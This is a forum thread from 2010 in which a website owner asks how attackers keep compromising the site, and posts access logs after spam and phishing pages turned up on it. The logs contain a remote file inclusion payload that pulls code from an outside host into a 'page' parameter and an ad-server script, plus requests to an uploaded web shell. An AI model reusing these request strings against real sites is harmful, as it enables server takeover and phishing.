How the heck is this attacker getting in???

**lucifersangel87** · Oct 31st, 2010, 12:58 am

Hi Guys,

Recently I made a rookie mistake in my coding and didn't sanitize the input of one of my PHP $_GET variables. As a result, i woke up to find numerous files and folders on my server and over 1400 spam emails sent from my SMTP.

I'll hold my hands up and admit epic fail on this one....

However, I dilligently went through my code that day and sanitized all inputs, removed all the dangerous files from the server, and expected no more trouble.

Thursday this week, they (or some other form of filth) got into my site yet again and planted more files trying to phish JP Morgan Chase Bank customers. Now looking at the logs, I can't immediately see how this could have been, except that i can see a lot of strange access logs that look like this:

120.164.19.158 - - [28/Oct/2010:11:16:59 -0500] "GET /images/index2_02.gif HTTP/1.1" 200 3314 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"

and then, it seems that they managed to somehow upload a "readme.php" file which contained a lot of very advanced php code, most of which I couldn't make head or tail of.

This is the last entry in the logs before they started accessing the readme.php file:

120.164.19.158 - - [28/Oct/2010:11:18:05 -0500] "GET /advertising/www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5&source=&r=93361232 &block=1&blockcampaign=1&withtext=1&charset=ISO-8859-1&loc=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F&referer=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F HTTP/1.1" 200 4025 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"

Anyone have any ideas how I can secure my site and ultimately stop these losers from raiding my server?

Thanks in advance

**lucifersangel87** · Oct 31st, 2010, 1:14 am

Just as an interesting adendum, this appears to be the log entry for the file upload... Now i'm thoroughly confused!

120.164.19.158 - - [28/Oct/2010:11:18:52 -0500] "GET /readme.php HTTP/1.1" 200 7683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"

Thanks

**lucifersangel87** · Nov 1st, 2010, 3:00 am

Just an update on this,

I've now set all files and folders in my Public_html directory to 0555. Will this prevent an attack, or is there a way that an attacker could change those permissions back themselves?

Thanks,

Martin